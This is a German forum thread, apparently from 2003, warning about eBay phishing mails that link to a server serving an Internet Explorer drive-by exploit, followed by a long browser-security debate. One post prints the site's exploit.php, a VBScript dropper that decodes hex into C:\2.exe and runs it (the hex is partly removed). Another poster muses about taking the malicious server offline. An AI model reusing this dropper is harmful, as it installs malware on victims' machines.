In letzter Zeit sind wieder verstärkt Mails mit Links auf gefälschte eBay-Seiten, auf denen man seine Kreditkartendaten "aktualisieren" soll und auf Seiten mit Trojanern/Keyloggern unterwegs.

Eine dieser Mails erreichte mich gestern. Die Mails bestehen aus einem einzigen Bild, das den vermeintlichen Text der Mail enthält. Dieses Bild fungiert aber als Link auf einen Server in Korea mit der Adresse



WARNUNG!!! DIESEN SERVER NICHT BETRETEN, WENN EUER SYSTEM NICHT MIT DEN NEUESTEN UPDATES UND SECURITY FIXES AKTUALISIERT WURDE UND IHR EUCH KEINEN TROJANER EINFANGEN WOLLT!!!

Ehemaliger Link (www.disney.com)

WARNUNG!!! DIESEN SERVER NICHT BETRETEN, WENN EUER SYSTEM NICHT MIT DEN NEUESTEN UPDATES UND SECURITY FIXES AKTUALISIERT WURDE UND IHR EUCH KEINEN TROJANER EINFANGEN WOLLT!!!

Es wird ein VBS ausgeführt, dass bei euch auf C:\ eine Datei namens 2.exe erzeugt, die dann den Virus installiert. Hatte den IE-Patch vom August 2003 noch nicht drauf und prompt war mein System infiziert.
Der (aktuelle) Virenkiller hat überhaupt nicht reagiert.


Hier ein Link zur Vireninfo:

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.html

Ich empfehle also allen, ihr System mit den neuesten Updates zu patchen und in Zukunft selbst beim Betreten fremder Websites vorsichtig sein.
Nach dem Blaster-Worm sollte man das sowieso regelmässig machen.


P.S. Ne Idee, wie man diesen Server unschädlich machen könnte?
Wie ich sehen konnte, ist FTP offen und es läuft MS IIS 5.0 drauf. Glaub mal nicht, das es jemanden stören würde, wenn der Rechner vom Netz geht... ;)

Ich hab das gerade mal ausprobiert...



Als 'index.html' bekommt man das geschickt:

<object DATA="exploit.php">

und die 'exploit.php' sieht so aus:

X-Powered-By: PHP/4.1.1
Content-Type: application/hta
Content-disposition: inline; filename=1.htm

<SCRIPT language=vbs>
self.MoveTo 6000,6000
set a=CreateObject("Scripting.FileSystemObject")
set b=a.CreateTextFile("C:\2.exe",1)
b.write(H("4D5A50000200000004000F00FFFF0000B80000000000000040001A000000"))

[hier hab ich was rausgenommen *g*]

b.Write(H("000000000000000000000000000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000820C42010001100034443541"))
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\2.exe")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
</SCRIPT>



Tja, üble Sache... Noch ein Grund mehr den IE in die Tonne zu treten. Das ist nämlich der einzige Browser der VBS 'beherrscht'...


edit:
Vielleicht solltest Du nochmal Dein Posting editieren und den Link entschärfen, damit hier keine Unfälle passieren, vor denen Du eigentlich warnen wolltest.

Original geschrieben von mplutka
WARNUNG!!! DIESEN SERVER NICHT BETRETEN, WENN EUER SYSTEM NICHT MIT DEN NEUESTEN UPDATES UND SECURITY FIXES AKTUALISIERT WURDE UND IHR EUCH KEINEN TROJANER EINFANGEN WOLLT!!!

Lalalala

WARNUNG!!! DIESEN SERVER NICHT BETRETEN, WENN EUER SYSTEM NICHT MIT DEN NEUESTEN UPDATES UND SECURITY FIXES AKTUALISIERT WURDE UND IHR EUCH KEINEN TROJANER EINFANGEN WOLLT!!!

Wie gut, daß man Mozilla immun dagegen ist. ;)

Wer mit dem Scheunentor Internet Exploiter unterwegs ist, der ist sich selber schuld!

Besonders dreist find ich den Text der besagten Spammail, in der ich aufgefordert wurde auf diese Seite zu gehen und zu prüfen, ob vor Kurzem meine Kreditkartendaten geklaut wurden. Geht man auf dem Webserver ins Unterverzeichnis stats, so kommt man auf eine dieser fake Seiten.

@krutz:

Soweit bin ich auch schon gekommen. Der Server steht übrigens in Korea und die IP gehört kornet. Mail an den Abuse Manager ist auch schon raus.

Hab grad gemerkt, dass meine Logindaten gar nicht angenommen werden und bei mir immernoch "Nicht registriert" steht. Kann demnach leider nicht den Eintrag editieren.

Muss wohl der Admin hier den Beitrag löschen, falls zuviele trotz der grossen Warnung drauf reinfallen...

Ich hab's schon editiert. :)

THX :)

Naja, mag zwar sein, dass der IE nicht idiotensicher ist, aber sobald man über die Ich-klick-auf-alles-was-bunt-blinkt-Phase hinaus ist, ist der IE nicht gefährlicher als andere Browser.

Original geschrieben von Dr.Doom
aber sobald man über die Ich-klick-auf-alles-was-bunt-blinkt-Phase hinaus ist, ist der IE nicht gefährlicher als andere Browser. Autsch!

Muss erst irgendwo (durch den IE verursacht) ein Wohnzimmer explodieren (mit 1000 Toten!!!11), damit diese Ignoranz endlich ein Ende hat?

Original geschrieben von Dr.Doom
Naja, mag zwar sein, dass der IE nicht idiotensicher ist, aber sobald man über die Ich-klick-auf-alles-was-bunt-blinkt-Phase hinaus ist, ist der IE nicht gefährlicher als andere Browser.
Halte ich für ein Gerücht. ;)

http://www.planet3dnow.de/cgi-bin/newspub/viewnews.cgi?category=2&id=1061551182

Am geilsten ist ja der Teil 'in dem einige Sicherheitslücken geschlossen wurden' ... muahaha

@ Dr.Doom:
Auf so einen Beitrag habe ich gewartet.
Normalerweise betrete ich fremde Sites erst gar nicht.
Bin ja auch schon etwas länger dabei ;)
Mir kam lediglich die IP des Rechners aufgrund mehrerer anderer Spammails bekannt vor.
Damit wollte ich nur mal zeigen, dass man selbst durch das Betreten dieser Seite infiziert werden kann.
Mit der Mail oder gar dem Klick darauf hat das überhaupt nix zutun.

Original geschrieben von mplutka
@ Dr.Doom:
Auf so einen Beitrag habe ich gewartet.
Normalerweise betrete ich fremde Sites erst gar nicht.
Bin ja auch schon etwas länger dabei ;)
Mir kam lediglich die IP des Rechners aufgrund mehrerer anderer Spammails bekannt vor.
Damit wollte ich nur mal zeigen, dass man selbst durch das Betreten dieser Seite infiziert werden kann.
Mit der Mail oder gar dem Klick darauf hat das überhaupt nix zutun.
Eben. Das Gleiche war mit dem Nimda-Wurm. Durch das blose Betreten einer Site hatte man sich infiziert. Danach hat der eigene Rechner andere Webserver mit ungepatchten IIS befallen und sich auch noch selbst per Mail verschickt.

Original geschrieben von Exxtreme
Halte ich für ein Gerücht. ;)

http://www.planet3dnow.de/cgi-bin/newspub/viewnews.cgi?category=2&id=1061551182 Klar, aber das ist ja auch kaum der IE 'an sich' schuld, sondern die dämliche Integration vom IE ins OS.

Ich weiss auch, dass der IE von der Perfektion verdammt weit weg ist, aber so grottig, wie viele immer sagen, ist er doch nun auch nicht.

Original geschrieben von Dr.Doom
Klar, aber das ist ja auch kaum der IE 'an sich' schuld, sondern die dämliche Integration vom IE ins OS.

Tja, das ist mir im Ernstfall völlig egal ob es der IE ist oder es an der Intergration liegt. Und meist liegt es tatsächlich an der Intergration da Teile des IE im Kernelspace laufen sprich, mehr Rechte haben als der Admin-Account.

Original geschrieben von Exxtreme
Tja, das ist mir im Ernstfall völlig egal ob es der IE ist oder es an der Intergration liegt.
Stimmt auch wieder, das Ergebnis zählt, nicht der Weg. *g*

Ich hab' mich halt an den IE gewöhnt und bleibe trotz allem dabei. *schulterzuck*

Original geschrieben von Dr.Doom
Stimmt auch wieder, das Ergebnis zählt, nicht der Weg. *g*

Ich hab' mich halt an den IE gewöhnt und bleibe trotz allem dabei. *schulterzuck*
Nimm halt Firebird/Mozilla mit IE-Skin und gut ist's.

Wenn sich die Site Hersteller dran halten würden.
War auf der Gainward Website mit Netscape 7.02 und nichts wars mit den Auswahlmenues.
Mit dem IE gings > Grrrrrr.

D.h. Immer schön zweigleisig sein.

g7

Original geschrieben von Exxtreme
Ich hab's schon editiert. :)

Mach das doch dann bitte auch noch in deiner Quote.
Nur um Sicher zu gehen =)

Original geschrieben von Madkiller
Mach das doch dann bitte auch noch in deiner Quote.
Nur um Sicher zu gehen =)
Danke. Des hen' i total verpoilt. :|

Original geschrieben von gerry7
Wenn sich die Site Hersteller dran halten würden.
War auf der Gainward Website mit Netscape 7.02 und nichts wars mit den Auswahlmenues.
Mit dem IE gings > Grrrrrr.

D.h. Immer schön zweigleisig sein.
Und? Mail an den Webmaster schon verschickt? Sonst ändert sich nie was ...

Original geschrieben von harkpabst_meliantrop
Und? Mail an den Webmaster schon verschickt? Sonst ändert sich nie was ...

*** NICK ******

Die haben mir was vom prozentualen Anteil
Netscape zu IE erzählt (Klartext = lohnt sich nicht).

Das fatale für mich in solchen Situationen ist unser Firmenproxy läßt nur Firmenstandard durch, und das ist Netscape.

g7

Original geschrieben von gerry7
Die haben mir was vom prozentualen Anteil
Netscape zu IE erzählt (Klartext = lohnt sich nicht).
Extrem peinlich. Und geradezu ein Grund, von einem Hersteller nicht mehr unbedingt was zu kaufen. Fast so schlimm wie Seiten, die man ohne Flash-Plugin gar nicht erst betreten kann.

Klar programmier ich manchmal auch Anwendungen nur für den IE. Und dann benutze ich natürlich auch die proprietären Features. Aber da geht es dann um Intranet-Anwendungen und nicht um öffentlich zugängliche Seiten.

Wäre sehr peinlich für einen recht großen Hersteller das die Websites nicht nach offiziellem Standard programmieren können

Evtl hilft eine neuere Version von Netscape oder Ihr benutzt direkt Mozilla

Hmmm - gainward.de scheint mit Mozilla 1.4 zu laufen

Original geschrieben von Denniss
Wäre sehr peinlich für einen recht großen Hersteller das die Websites nicht nach offiziellem Standard programmieren können

Evtl hilft eine neuere Version von Netscape oder Ihr benutzt direkt Mozilla

Hmmm - gainward.de scheint mit Mozilla 1.4 zu laufen

Habe den 7.1 da geht es nicht.
Es geht nicht um die Seite.
Und zwar mach mal Support-Downloads- BIOS/Treiber auf.

Dort könnte man mit PullDowns Modellreihe und Typ auswählen (wenns ging).

g7

also www.gainward.com

"Best View Resolution: 800X600 for IE 5.0 or later"

Wer auf einen sicheren Browser bedacht ist steht bei denen also im Regen - ist echt beschämend und zeigt was die Webmaster dort für eine Ahnung haben ....

Original geschrieben von gerry7
Habe den 7.1 da geht es nicht.
Es geht nicht um die Seite.
Und zwar mach mal Support-Downloads- BIOS/Treiber auf.

Dort könnte man mit PullDowns Modellreihe und Typ auswählen (wenns ging).
Gut, wenn der Webmaster zu blöd ist, schreib doch gleich an den technischen Support die Bitte, dir die benötigten Dateien per E-Mail zuzuschicken, da ein Download von der Webseite mit nicht möglich ist.

Das Dankschreiben auf die Antwort kannst dann nochmal an den Webmaser mit verschicken. Und zwar im CC, nicht im BCC.

Es hat zwar nur indirekt mit dem ursprünglichen Thema zu tun, aber ich möchte (es überkommt mich gerade *lechz*) trotzdem nachtreten:

Sicherheitsupdate für Internet Explorer unwirksam

http://www.heise.de/newsticker/data/dab-08.09.03-000/